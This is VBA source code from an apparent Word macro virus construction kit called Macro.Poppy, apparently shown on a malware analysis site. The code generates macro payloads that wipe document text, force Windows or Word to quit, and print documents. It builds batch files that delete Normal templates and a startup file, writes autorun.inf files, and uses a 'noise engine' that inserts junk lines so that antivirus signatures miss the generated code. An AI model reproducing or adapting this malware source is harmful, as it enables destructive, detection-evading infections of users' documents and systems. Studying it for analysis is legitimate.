Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, " Selection.HomeKey Unit:=wdStory" Print #hFile, " Selection.Find.ClearFormatting" Print #hFile, " Selection.Find.Replacement.ClearFormatting" Print #hFile, " With Selection.Find" Print #hFile, " .Text = """ & ReplaceT & """" Print #hFile, " .Replacement.Text = """ & WithT & """" Print #hFile, " .Forward = True" Print #hFile, " .Wrap = wdFindContinue" Print #hFile, " .Format = False" Print #hFile, " .MatchCase = False" Print #hFile, " .MatchWholeWord = True" Print #hFile, " .MatchAllWordForms = False" Print #hFile, " End With" Print #hFile, " Selection.Find.Execute Replace:=wdReplaceAll" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") End If If Payload = 3 Then Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, " If ActiveDocument.Saved = False Then ActiveDocument.Save" Print #hFile, "Tasks.ExitWindows" End If If Payload = 4 Then Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, " If ActiveDocument.Saved = False Then ActiveDocument.Save" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "Appilcation.Quit" End If If Payload = 5 Then Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, " ActiveDocument.PrintOut" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, " Call " + pload$ End If If Payload = 6 Then Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, " Selection.WholeStory" Print #hFile, " Selection.Delete Unit:=wdCharacter, Count:=1" Print #hFile, " ActiveDocument.Save" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") End If Print #hFile, "End Sub" End If ' Build Read-Only Remover If ROR_X = True Then Print #hFile, " " Print #hFile, "Sub vBitchES(strFile As String)" Print #hFile, " " Print #hFile, "Dim hFile As Long" Print #hFile, "On Error Resume Next" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "n$ = NormalTemplate" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "Part11$ = ""attrib -h -r """ Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "snag$ = ""c:\progra~1\micros~1\templa~1\""" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "snag1$ = ""c:\progra~1\micros~2\templa~1\""" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "Part2$ = ""del """ Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "hFile = FreeFile" Print #hFile, "Open strFile For Output Access Write As hFile" Print #hFile, "Print #hFile, ""@echo off""" Print #hFile, "Print #hFile, Part11$ + snag$ + n$" Print #hFile, "Print #hFile, Part11$ + snag1$ + n$" Print #hFile, "Print #hFile, Part2$ + snag$ + n$" Print #hFile, "Print #hFile, Part2$ + snag1$ + n$" Print #hFile, "Print #hFile, ""cls""" Print #hFile, "Print #hFile, Part2$ + ""c:\windows\startm~1\programs\startup\msfile.bat""" Print #hFile, "Close hFile" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "End Sub" End If If ID_X = True Then Print #hFile, "Sub dhIconDisco(strFile As String)" Print #hFile, "Dim hFile As Long" Print #hFile, "On Error Resume Next" Print #hFile, "Randomize" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "Choice = Int(Rnd * 2)" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "rnn$ = Int(Rnd * 66) + 2" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "rn$ = Int(Rnd * 27) + 1" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "Part1$ = ""[autorun]""" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "Part2$ = ""icon = c:\windows\system\pifmgr.dll,""" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "Part22$ = ""icon = c:\windows\SYSTEM\shell32.dll,""" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "Part3$ = Part2$ + rn$" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "Part33$ = Part22$ + rnn$" Print #hFile, " hFile = FreeFile" Print #hFile, " Open strFile For Output Access Write As hFile" Print #hFile, " Print #hFile, Part1$" Print #hFile, " If Choice = 0 Then" Print #hFile, " Print #hFile, Part3$" Print #hFile, " Else" Print #hFile, " Print #hFile, Part33$" Print #hFile, " End If" Print #hFile, " Close hFile" Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Call MacroNoiseEngine("c:\windows\desktop\macpoppy.bas") Print #hFile, "End Sub" End If Close hFile End Sub Sub MacroNoiseEngine(strFile As String) Randomize noisechance = Int(Rnd * 6) roll1 = Int(Rnd * 6) roll2 = Int(Rnd * 6) roll3 = Int(Rnd * 6) roll4 = Int(Rnd * 6) roll5 = Int(Rnd * 6) roll6 = Int(Rnd * 6) makefake1 = Int(Rnd * 9999) makefake2 = Int(Rnd * 9999) makefake3 = Int(Rnd * 9999) scramble1 = Int(Rnd * 9999) scramble2 = Int(Rnd * 9999) scramble3 = Int(Rnd * 9999) fakevar1$ = "f" & makefake1 + scramble1 fakevar2$ = "u" & makefake2 + scramble2 fakevar3$ = "c" & makefake3 + scramble3 fakevar4$ = "k" & makefake1 + scramble3 fakevar5$ = "m" & makefake2 + scramble2 fakevar6$ = "e" & makefake3 + scramble1 If Noise > noisechance Then ' Begin Noise Crap hFile = 1 If roll1 = 1 Then Print #hFile, fakevar1$ + " = " + fakevar2 + " & " + fakevar3 + " & Int(Rnd * " & scramble3 & ")" End If If roll1 = 2 Then Print #hFile, fakevar4$ + " = " + fakevar5 + " & " + fakevar6 End If If roll1 = 3 Then Print #hFile, fakevar1$ + " = " + fakevar2 + " & " + fakevar3 + " & Int(Rnd * " & scramble1 & ")" End If If roll1 = 4 Then Print #hFile, fakevar4$ + " = " + fakevar5 + " & " + fakevar6 End If If roll1 = 5 Then Print #hFile, fakevar1$ + " = " + fakevar2 + " & " + fakevar3 + " & " + fakevar4 + " & " + fakevar5 End If If roll1 = 6 Then Print #hFile, fakevar4$ + " = " + fakevar5 + " & " + fakevar6 + " & " + fakevar2 + " & " + fakevar3 End If End If If Noise = 6 Then Print #hFile, fakevar1$ + " = " + fakevar5 + " & " + fakevar3 + " & Int(Rnd * " & scramble2 & ")" End Sub Attribute VB_Name = "PoppyStartFrm" Attribute VB_Base = "0{B82BFB91-9023-11D1-9F3B-444553540000}{B82BFA48-9023-11D1-9F3B-444553540000}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub CommandButton1_Click() PoppyStartFrm.Hide PoppyOptionsFrm.Show End Sub Private Sub ExitBtn_Click() PoppyStartFrm.Hide ExitFrm.Show End Sub Private Sub Image1_Click() MsgBox "Hello I'm Vic the Macro.Poppy bug...", vbOKOnly, "meep meep" End Sub Private Sub Image2_Click() MsgBox "Hello I'm Vic the Macro.Poppy bug...", vbOKOnly, "meep meep" End Sub Private Sub InfoBtn_Click() PoppyStartFrm.Hide PoppyInfoFrm.Show End Sub Attribute VB_Name = "PoppyOptionsFrm" Attribute VB_Base = "0{B82BFB95-9023-11D1-9F3B-444553540000}{B82BFA4A-9023-11D1-9F3B-444553540000}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False …

Open this report in the interactive analyzer, or submit your own file for analysis.